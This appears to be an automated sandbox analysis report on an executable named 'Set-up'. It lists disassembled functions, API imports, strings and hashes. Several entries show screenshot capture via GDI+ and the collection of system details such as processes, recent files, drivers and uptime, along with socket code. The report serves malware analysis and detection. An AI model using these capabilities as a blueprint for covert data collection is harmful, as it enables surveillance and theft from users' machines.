Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: DriveFileFind$CallbackDiskDispatcherEnumFirstFolderFreeGlobalInfoKnownLogicalMemoryNextPathProcessesSpaceStatusStringsSystemTypeUsermallocstrlenwcscatwcscpy
String ID: @$Num_displays$Num_processor$Num_ram$`$all$drivers$free$name$processes$recent_files$resolution_x$resolution_y$uptime_minutes
API String ID: 2116500361-3337672980
Opcode ID: 9d13a4d626cd5b7d4e90a80cda2eec14cba6f4ccb40a78441ffacc071ec70146
Instruction ID: 37269832d3cde22e2c782d8dfc67a1bb1f88f080e6162902d49fde914f5086d8
Opcode Fuzzy Hash: 9d13a4d626cd5b7d4e90a80cda2eec14cba6f4ccb40a78441ffacc071ec70146
Instruction Fuzzy Hash: C0D1A2B49057199FCB40EFA9C5856AEBBF0BF84304F40896EE598D7301E7749A84CF92

Function 003B8D6A Relevance: 45.6, APIs: 16, Strings: 10, Instructions: 134
filelibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 003B8DAF
GetProcAddress.KERNEL32 ref: 003B8DD3
GetProcAddress.KERNEL32 ref: 003B8DE9
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 003B8FCF
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 003B8FF0
FreeLibrary.KERNEL32 ref: 003B8FF8

Part of subcall function 003B7E20: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 003B7E6D
Part of subcall function 003B7E20: wcscmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 003B7EB6
Part of subcall function 003B7E20: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 003B7ED8

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 003B9077
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 003B9098
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 003B90AF
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 003B90D0
FreeLibrary.KERNEL32 ref: 003B90D8
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 003B90F7
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 003B9118
FreeLibrary.KERNEL32 ref: 003B9120

Strings

GdipSaveImageToStream, xrefs: 003B8DDE
Failed to load GDI+ functions, xrefs: 003B90C9
Failed to create GDI+ bitmap, xrefs: 003B8FE9
Failed to get JPEG encoder CLSID, xrefs: 003B9111
!, xrefs: 003B90FD
image/jpeg, xrefs: 003B8E34
Failed to load gdiplus.dll, xrefs: 003B9091
GdipCreateBitmapFromHBITMAP, xrefs: 003B8DC8
Failed to allocate buffer, xrefs: 003B9218
gdiplus.dll, xrefs: 003B8DA8

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: Library__acrt_iob_funcfwrite$Free$AddressProc$Loadfreemallocwcscmp
String ID: !$Failed to allocate buffer$Failed to create GDI+ bitmap$Failed to get JPEG encoder CLSID$Failed to load GDI+ functions$Failed to load gdiplus.dll$GdipCreateBitmapFromHBITMAP$GdipSaveImageToStream$gdiplus.dll$image/jpeg
API String ID: 4185073593-1943330374
Opcode ID: 34f086052969a3212433401388879f484fcf6ba90e0b1598f30782816bdb7f53
Instruction ID: 1f148ed5bb800fba2877af19ef99d6326cf288741dca5f35c6c77ed423341467
Opcode Fuzzy Hash: 34f086052969a3212433401388879f484fcf6ba90e0b1598f30782816bdb7f53
Instruction Fuzzy Hash: 955138B09093049FDB10AF68D8483AEBFF5FF45314F01896ED98887641DBBA9985CF52

Function 003A8E90 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 003A8EAD
_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 003A8EFA
_write.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 003A8F4A
_close.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 003A8F59

Strings

@, xrefs: 004FDFF1
terminated, xrefs: 003A8F20
CONOUT$, xrefs: 003A8EA6
,&o, xrefs: 004FE02D

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$,&o$@$CONOUT$
API String ID: 28676597-1958761126
Opcode ID: d2faedd5493422dc68bf380048360d7ef7a9e61ec2c2c0a8156f2a423b265011
Instruction ID: 8877d0c4b8c60bde9deb8631aabd5f50b598f7cea5429a93c2ac04a87832d86a
Opcode Fuzzy Hash: d2faedd5493422dc68bf380048360d7ef7a9e61ec2c2c0a8156f2a423b265011
Instruction Fuzzy Hash: 674137B09043058FCB01EF79D844A6EBBE5EB49354F018A2EE8A5D7390EB78D845CF56

Function 000EAA30 Relevance: 19.9, APIs: 13, Instructions: 364
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

htons.WS2_32(?), ref: 000EAAE8
htons.WS2_32(?), ref: 000EAB33
socket.WS2_32(FFFFFFFF,?,00000000), ref: 000EAB9A
ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 000EABE3
setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 000EAC02
setsockopt.WS2_32(?,0000FFFF,00001002,00000000,00000004), ref: 000EAC29
htonl.WS2_32(00000000), ref: 000EAC69
bind.WS2_32(?,00000017,0000001C), ref: 000EACCF
setsockopt.WS2_32(?,00000029,0000001B,0000001C,00000004), ref: 000EACFE
setsockopt.WS2_32(?,00000006,00000001,0000001C,00000004), ref: 000EAD20
WSAGetLastError.WS2_32 ref: 000EADB5
closesocket.WS2_32(?), ref: 000EAE6F

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: setsockopt$htons$ErrorLastbindclosesockethtonlioctlsocketsocket
String ID:
API String ID: 4039825230-0
Opcode ID: ca5678fad836d728aa44afccdcac2022ebf7214ba5b9ece4f290fef8bd53275b
Instruction ID: 5fe1ad64baec7d1d9089b04358ec1ddfce55defd5380ab882700cdad28dde6d3
Opcode Fuzzy Hash: ca5678fad836d728aa44afccdcac2022ebf7214ba5b9ece4f290fef8bd53275b
Instruction Fuzzy Hash: D1E19E707043819FEB208F25C884B6A77E5BF8A310F144A29F999AB2A1D775E944CB52

Function 0002116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 000211B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00021238
_set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0002124D
__p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00021261
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000212EB
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00021323
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0002132E
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00021344
GetStartupInfoA.KERNEL32 ref: 00021433

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdln_set_invalid_parameter_handlermemcpystrlen
String ID:
API String ID: 3873122205-0
Opcode ID: 6992b57e130327b204df4790f85b3d58441a7e4f09516c4f021a6f9af006eaec
Instruction ID: af18b6c44a6248fba4f8547ee20990ff10162b54ad8be9a019eaa7f8d3b97d46
Opcode Fuzzy Hash: 6992b57e130327b204df4790f85b3d58441a7e4f09516c4f021a6f9af006eaec
Instruction Fuzzy Hash: 29819CB1908325CFDB50EF64E8817AEBBE2FF55304F00442DE9859B352DB75A858CB91

Function 004F38F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

error CryptGenRandom 0x%08lx, xrefs: 004F3A69

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID:
String ID: error CryptGenRandom 0x%08lx
API String ID: 0-1222942552
Opcode ID: 56512d8b00437d8a7f9a3cead9cc1108d4ea42d018cffed5e5527290117ad894
Instruction ID: 11810400d755a14d619ce0133b81507406f735662ea5b6bf0fe2dc804f681fa6
Opcode Fuzzy Hash: 56512d8b00437d8a7f9a3cead9cc1108d4ea42d018cffed5e5527290117ad894
Instruction Fuzzy Hash: 7C41E4B59093019FC700EF78D58962ABBE1AB88345F419E2EF899C7350EB78C544CF42

Function 000305B0 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 369
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAEventSelect.WS2_32(?,8508C483,?), ref: 00030711
getsockopt.WS2_32(?,0000FFFF,00001008,?,00000004), ref: 00030783
WSAWaitForMultipleEvents.WS2_32(00000001,00023EBE,00000000,00000000,00000000), ref: 0003086F
WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 000308EF
WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00030934
WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 000309DC
WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 000309FB
WSAResetEvent.WS2_32(8508C483), ref: 00030A1F

Strings

multi.c, xrefs: 000307B2

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: Event$EventsSelect$EnumNetwork$MultipleResetWaitgetsockopt
String ID: multi.c
API String ID: 3264668090-214371023
Opcode ID: e7981b50ab3304e6d503ba5cc1fc3820a843d08796a282f0a4faec68d8e76e88
Instruction ID: d9b37dac28c1d39fafd4016d2532f0c8452358c0b409f160ab470fdbb19e2e8f
Opcode Fuzzy Hash: e7981b50ab3304e6d503ba5cc1fc3820a843d08796a282f0a4faec68d8e76e88
Instruction Fuzzy Hash: 8BD1C071A093019FE722DF64D891BAB77E9FF84308F04482DF889C6252E775E958CB52

Function 00036FA0 Relevance: 13.8, APIs: 9, Instructions: 255sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?), ref: 00037010

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: b4823cce7c4ed899a359298ca37ba1cef56b21666dfaf4e771734a58ce94c0f6
Instruction ID: 354b9aac3ce7ee42f0eea10f1b0aec1328f011362059dee8fe6d39204d88e30b
Opcode Fuzzy Hash: b4823cce7c4ed899a359298ca37ba1cef56b21666dfaf4e771734a58ce94c0f6
Instruction Fuzzy Hash: 0F91FFB160C3498BD7768B69C8847BBB2EDEFC4360F148B2CE89D861D5EB719D40D681

Function 000211A3 Relevance: 12.1, APIs: 8, Instructions: 115sleepstringCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 000211B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00021238
_set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0002124D
__p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00021261
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000212EB
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00021323
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0002132E
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00021344
_initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0002140C

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled__p__acmdln_initterm_set_invalid_parameter_handlermemcpystrlen
String ID:
API String ID: 1209083157-0
Opcode ID: f7a33ff89da467e18089bb3b4d6ad08cb53f7e886aede8d824bdd30b8f3122ce
Instruction ID: 54981c0a3d3355dd35d162b770a4e2027db375a96b372b153a5303826e9b6d24
Opcode Fuzzy Hash: f7a33ff89da467e18089bb3b4d6ad08cb53f7e886aede8d824bdd30b8f3122ce
Instruction Fuzzy Hash: 274137B0A043158FEB51EF68E9807AEBBE2FF55304F00592DD8889B352DB74A945CF91

Function 000213C9 Relevance: 12.1, APIs: 8, Instructions: 109stringCOMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00021238
_set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0002124D
__p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00021261
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000212EB
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00021323
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0002132E
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00021344

Part of subcall function 003A8A20: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,000213EF), ref: 003A8A2A

_initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0002140C

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: malloc$ExceptionFilterUnhandled__acrt_iob_func__p__acmdln_initterm_set_invalid_parameter_handlermemcpystrlen
String ID:
API String ID: 2715571461-0
Opcode ID: 5473786f66ef193d2cc2137cf999330896b3d00ae423b0f64c6db487adb00976
Instruction ID: a331a794726f366f41c2845bbc534a0a0a1e0689d3158f4eee456020ee2bb1ae
Opcode Fuzzy Hash: 5473786f66ef193d2cc2137cf999330896b3d00ae423b0f64c6db487adb00976
Instruction Fuzzy Hash: B84144B0A083158FDB51EF64E8807ADBBE2FF55304F10582DE9889B352DB74A844CF52

Function 000EB180 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 320COMMON

Download Yara Rule

APIs

getsockname.WS2_32(-00000020,-00000020,?), ref: 000EB2B6
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(cur != NULL,ares__sortaddrinfo.c,000001A4,?,?,00000000,0000000B,?,?,000D3C41,00000000), ref: 000EB3F7

Strings

ares__sortaddrinfo.c, xrefs: 000EB3ED
cur != NULL, xrefs: 000EB3F2

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _assertgetsockname
String ID: ares__sortaddrinfo.c$cur != NULL
API String ID: 1186336949-2430778319
Opcode ID: 69910924f9999ad6f0e7b962978224d7c98169896df93a7ee7dbf487290b5f48
Instruction ID: a5555534e3c1aa6304a46d1031329c5908d456917e1b67e41fcdef2620efcb27
Opcode Fuzzy Hash: 69910924f9999ad6f0e7b962978224d7c98169896df93a7ee7dbf487290b5f48
Instruction Fuzzy Hash: 02C16E716043559FD718DF26C881A6BB7E1BF88304F04886DF949AB3A2DB34ED45CB81

Function 00021160 Relevance: 10.6, APIs: 7, Instructions: 131sleepstringCOMMON

Download Yara Rule

APIs

